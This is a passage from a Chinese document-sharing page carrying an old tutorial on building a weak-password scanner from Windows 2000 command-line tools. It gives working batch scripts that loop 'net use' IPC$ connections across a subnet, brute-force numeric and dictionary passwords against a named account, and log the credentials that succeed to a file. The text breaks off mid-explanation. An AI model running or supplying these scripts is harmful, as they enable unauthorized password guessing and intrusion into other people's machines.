- 1、本文档共5页,可阅读全部内容。
- 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
Win2k命令行下自做弱口令扫描器
Win2k命令行下自做弱口令扫描器
Win2k命令行下自做弱口令扫描器关键词: Win2k命令行下自做弱口令扫描器??????????????????????????????????????????几天前在安全焦点上看见web_wolf的一篇帖子“173字节的nt_server弱口令扫描器”内容如下:
批处理文件test.bat-------------------@echo offecho 格式:test *.*.*test.txtfor /L %%G in (1 1 254) do echo %1.%%G test.txt net use \\%1.%%G\ipc$ /use:Administrator | find 命令成功完成 test.txt
这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc$连接,如果成功就把结果记录在test.txt。短短173字节,就实现了弱口令扫描的功能!惊叹web_wolf思维之独到并感慨吾等菜鸟何日能成正果之时,不禁也有所悟:win2k命令行命令也可以用来远程破解NT弱口令!我们知道,在win2k命令行下有个for命令,其功能是对一组文件中的每一个文件执行某个特定命令,也就是可以用你指定的循环范围生成一系列命令。For命令的格式为:FOR %variable IN (set) DO command [command-parameters]当然,for命令最强大的功能,表现在它的一些高级应用中。譬如可以用 /r 参数遍历整个目录树;可以用 /f 参数将文本文件内容作为循环范围;可以用 /f 参数将某一命令执行结果作为循环范围等等。在这里我不一一说明其用法,如果你不熟悉for命令,可以参考相关资料教程。For命令应用最简单的例子,就是人工指定循环范围,然后对每个值执行指定的命令如果我们把密码做为循环值,把net use命令作为指定命令。那将会产生什么样的效果呢?请看下面的命令:for /l %i in (100,1,999) do net use \ipipc$ %i /user: username解释一下:username是你用nbtstat得到的用户名,这条命令的功能是对指定username进行3位数纯数字密码依次尝试建立ipc连接,直到建立成功或者数字全部试完。如果你网速够快的话,跑完这900个数字也需要多长时间。也许你想到了,如果对方密码不是纯数字怎么办?有办法!我们还可以用字典,上面不是提到了可以用 /f 参数将文本文件内容作为循环范围吗?for /f %i in (pass.txt) do net use \ipipc$ %i /user:usernamepass.txt是字典文件,其格式为一个密码占一行。例如:123123412345abcabcd
这条命令的功能是对指定帐号username用密码字典pass.txt中的密码依次尝试建立ipc连接,直到建立成功或者密码全部试完。可问题还是有,虽然这样我们碰巧是能连接成功,可我们仍然不知道密码啊,下次要用还得重新全部试过。 我们应该想办法把尝试成功的用户名和密码保存在指定文件才行啊!以下是我实验后的结果,也许不是什么好方法,但是完全可以实现对指定ip扫描并且把结果保存在指定文件。由于我们现在要实现的功能不是一句命令所能完成的,所以我们把所有命令写成批处理文件。先提醒一下,在批处理文件中使用 FOR 命令时,指定变量使用 %%variable,而不是%variable。将下面内容存为scan.bat:
@echo offecho Written By ypy %4echo Email:ypy_811@ %4echo --------------------------------- %4date /t %4time /t %4echo ---- %4echo Result:%4start scan… /min cmd /c for /f %%i in (%2) do call ipc.bat %1 %%i %3 %4exit
将下面内容存为ipc.bat:
net use \%1ipc$ %2 /user:%3goto result%ERRORLEVEL%:result0echo Remote Server:%1 %4echo Username:%3 %4echo Password:%2 %4echo ---- %4net use \%1ipc$ /delexit:result2
ipc.bat中的%ERRORLEVEL%表示取前一命令执行后的返回结果。net use命令
您可能关注的文档
最近下载
- 公路劳务劳务施工方案.docx VIP
- 部编版语文六年级下册小升初考试课外文言文小古文阅读理解含答案.pdf VIP
- 安全教育培训课件水利工程施工与安全.pptx
- 国家职业技能标准:轨道交通信号工.pdf VIP
- 内部控制报告填报预算业务管理制度收支业务管理制度政府采购业务管理制度资产管理制度建设项目管理制度合同管理制度.doc VIP
- Unit 4 Eat Well(大单元教学设计) 人教版七年级英语下册.pdf
- 串行数据分析仪.pdf VIP
- 主检医师规范化及能力提升培训考试试题.pdf
- NY_T 2116-2012虫草制品中虫草素和腺苷的测定 高效液相色谱法.pdf
- 会计英语 全套课件.ppt
文档评论(0)